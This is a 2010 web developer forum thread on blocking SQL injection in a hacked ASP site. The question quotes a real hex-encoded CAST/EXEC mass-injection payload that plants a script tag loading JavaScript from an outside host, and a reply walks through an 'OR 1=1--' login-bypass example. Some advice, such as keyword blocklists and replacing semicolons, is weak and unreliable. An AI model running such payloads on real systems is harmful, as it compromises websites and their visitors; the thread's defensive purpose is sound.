473,386 Members | 1,798 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > asp / active server pages > questions > sql injection prevention & asp

Join Bytes to post your question to a community of 473,386 software developers and data experts.

SQL injection prevention & asp

hi
I am trying to block from the hackers.
Expand|Select|Wrap|Line Numbers
  1. (CAST(0X4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
  2.  
Here is my code: How should I modify to block the cast statement above.
Expand|Select|Wrap|Line Numbers
  1. <%
  2. 'Use these Constants to designate the type of Event Log.
  3. const TYP_SUCCESS = 0
  4. const TYP_ERROR = 1
  5. const TYP_WARNING = 2
  6. const TYP_INFORMATION = 4
  7. const TYP_AUDIT_SUCCESS = 8
  8. const TYP_AUDIT_FAILURE = 16
  9.  
  10. Dim Con
  11.  
  12. ' SQL Injection blocking
  13.  
  14. Dim strQuery, strVariable, strValue
  15.  
  16. strQuery = UCase(Request.QueryString)
  17. strQuery = Replace(strValue, "(CAST", "")
  18.  
  19. For Each strVariable In Request.QueryString
  20.     strValue = UCase(Request.QueryString(strVariable))
  21.     If (InStr(strValue,"EXEC(") > 0 OR _
  22.         InStr(strValue,"CAST(") > 0 OR _
  23.         InStr(strValue,";--") > 0 OR _
  24.         InStr(strValue,"'") > 0) AND _
  25.         strValue <> "Exec" AND _
  26.         strValue <> "CAST" AND _
  27.         strValue <> ";--" AND _
  28.         strValue <> "'" Then
  29.  
  30.         Response.Write "It appears your request contains illegal values.  Please use your back button to change the data or contact .com"
  31.  
  32.         WriteEventLog "Illegal internet request detected (" & strValue & " - " & Request.ServerVariables("PATH_INFO") & " - " & Request.ServerVariables("REMOTE_ADDR") & ")", TYP_WARNING
  33.  
  34.         Response.End 
  35.     End If
  36. Next
  37.  
  38. For Each strVariable In Request.Form
  39.     strValue = UCase(Request.Form(strVariable))
  40.     If (InStr(strValue,"EXEC(") > 0 OR _
  41.         InStr(strValue,"CAST(") > 0 OR _
  42.         InStr(strValue,";--") > 0 OR _
  43.         InStr(strValue,"'") > 0) AND _
  44.         strValue <> "Exec" AND _
  45.         strValue <> "CAST" AND _
  46.         strValue <> ";--" AND _
  47.         strValue <> "'" Then
  48.  
  49.         Response.Write "It appears your request contains illegal values.  Please use your back button to change the data or contact .com"
  50.  
  51.         WriteEventLog "Illegal internet request detected (" & strValue & ")", TYP_WARNING
  52.  
  53.         Response.End 
  54.     End If
  55. Next
  56.  
thank you!
Dec 1 '10 #1
5 2369
jhardman
3,406 Expert 2GB
What is an example of a legal post here? What is acceptable?

Jared
Dec 1 '10 #2
Any letters is acceptable except cast, Exec, Execute statement that hackers do. Out asp site got hacked few times. I am trying to block sql injection
Dec 1 '10 #3
jhardman
3,406 Expert 2GB
First notice the use of semi-colons. Every sql injection I've heard of uses either semi-colons or the 'go' keyword. (I've heard rumors of others, but if I knew what they were, I certainly wouldn't post them here) So the first thing I would do is replace all semi-colons with the appropriate html character code.
Expand|Select|Wrap|Line Numbers
  1. strValue = replace(strValue, ";", "&semi;")
notice that this will foil 99% of injections, but will display correctly on the screen for those times that a semi-colon is needed.

Second, I would use the instr() function you use above to test for "cast(" and "exec(" and cause the whole thing to fail. The only difference I would put is not use if ... Or ... or ... Or. It's just very easy to make mistakes in those. There's no problem testing for one at a time, but if you want to be more elegant, make an array of forbidden strings, and loop thru them testing for each one individually. Does this make sense?

Jared
Dec 1 '10 #4
Hi Jared
Thank you for the great explanation.
Dec 1 '10 #5
danp129
323 Expert 256MB
The hacker either escaped a user input field that was compared as a string and you didn't escape the single quotes, or they simply passed it in a input field that you compared as a number without ensuring the input was numeric. Other databases have some extra escape characters that will affect string comparisons.


I have not seen a SQL injection attack that worked on Microsoft SQL Server if these simple things were followed:

Strings:
Replace single quotes with two single quotes i.e. Replace(userInput, "'", "''").
Do not truncate user input after single quotes have been replaced. You may end up removing a doubled quote that escaped one before it which now allows the next user input to run as a command if more than one user input is used in the query.

Numbers:
Make sure numbers are numeric using isNumeric or converting it (cLng, cInt, cDbl, etc). This will not allow comments or semi-colons or anything other else that is not than a numeric value.



There are a lot of examples that explain replacing quotes and making sure numbers are numbers, here's an example of how truncating user input after replacing the quotes can cause an issue:

Expand|Select|Wrap|Line Numbers
  1. dim strSql
  2. dim userInputName
  3. dim userInputPass
  4.  
  5. userInputName = " ''" ' value from Request.Form("username") 
  6. userInputPass = "OR 1=1--" ' value from Request.Form("password")
  7.  
  8. userInputName = replace(userInputName, "'", "''")
  9. userInputPass = replace(userInputPass, "'", "''")
  10.  
  11.  
  12. ' Note values of vars holding user input are now:
  13. ' userInputName = " ''''" (a space and 4 single quotes)
  14. ' userInputPass = "OR 1=1--"
  15.  
  16. userInputName = left(userInputName, 4) ' You likely wouldn't limit to 4 but makes example easier to read
  17. userInputPass = left(userInputPass, 10)
  18.  
  19. ' Note values of vars holding user input are now:
  20. ' userInputName = " '''" (a space and 3 single quotes [an odd number of quotes])
  21. ' userInputPass = " OR 1=1--"
  22.  
  23. Example Query:
  24. strSql = "SELECT * FROM users WHERE" & _
  25.          " username='" & userInputName & "'" & _
  26.          " AND" & _
  27.          " password='" & userInputPass & "'"
  28.  
  29.  
  30. Concatenated string (made multi-line for easier reading):
  31. SELECT * FROM users WHERE
  32. username=' '''' AND password='
  33. OR 1=1--'
  34.  
  35. (note -- is comment and everything after -- is ignored if it is not quoted)
  36.  
  37.  
I would also recommend using parameterized SQL instead of concatenating user input. See the 3rd example here for how to use parameterized SQL without a stored procedure. This is slightly safer in some cases but the best part is it is easier to read and maintain once you get used to it and you will be ready to use stored procedures with little changes if/when the time comes.
Dec 9 '10 #6

Sign in to post your reply or Sign up for a free account.

Similar topics

4
Hacking Prevention
by: leke | last post by:
I have been lurking here for a while and I have noticed some people writing about problems with their sites being hacked. As I am fairly new to this scene so I don't want to fall into vulnerable...
PHP
7
Select & Update at the same table at same time
by: andri.wardhana | last post by:
Hi Guys, I have a problem with my ASP file. since I'm all new in ASP, i found that the error statement generated by ASP is confusing. basically what I want to do in this script is ability to...
ASP / Active Server Pages
1
ASP and SQL Injection prevention
by: Simon Wigzell | last post by:
Is it possible to "intercept" all calls to conn.execute and have them go to a checking routine that will either let the command go through or terminate it if it contains some illegal instructions?...
ASP / Active Server Pages
16
SQL Injection Prevention Quickfix.. will it work
by: Michael Kujawa | last post by:
Hi All, I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but limited time right now to redo correctly....
ASP / Active Server Pages
1
sql injection prevention
by: Doug | last post by:
Hi, I have a question on sql injection attacks. I am building a tool that will be used exclusively by our other developers and will generate stored procs for them dynamically based off input...
C# / C Sharp
6
curl attack prevention
by: K. | last post by:
Hello all! Can you write me some code which let me sleep calm during the night and what should I do to prevent some attackers from using curl function? In Poland there is a big portal which...
PHP
2
question about validation and sql injection
by: Sudhakar | last post by:
A) validating username in php as part of a registration form a user fills there desired username and this is stored in a mysql. there are certain conditions for the username. a) the username...
PHP
0
Easy Steps to Fix "Canon Printer Won't Connect to WiFi Network"
by: taylorcarr | last post by:
A Canon printer is a smart device known for being advanced, efficient, and reliable. It is designed for home, office, and hybrid workspace use and can also be used for a variety of purposes. However,...
General
0
Batch import of multiple excel files into the database
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
Data Management
0
Merging data from multiple Excel files
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
Data Management
0
Migrating Website to Cloud - Emmanuel Katto
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
General
0
BarryA
Navigating the Data Structures and Algorithms (DSA)
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
Algorithms / Advanced Math
1
Looking to do Android software development, any suggestions? Is flutter better?
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
General
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++
0
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
General
0
Changing the language in Windows 10
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
Windows Server

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!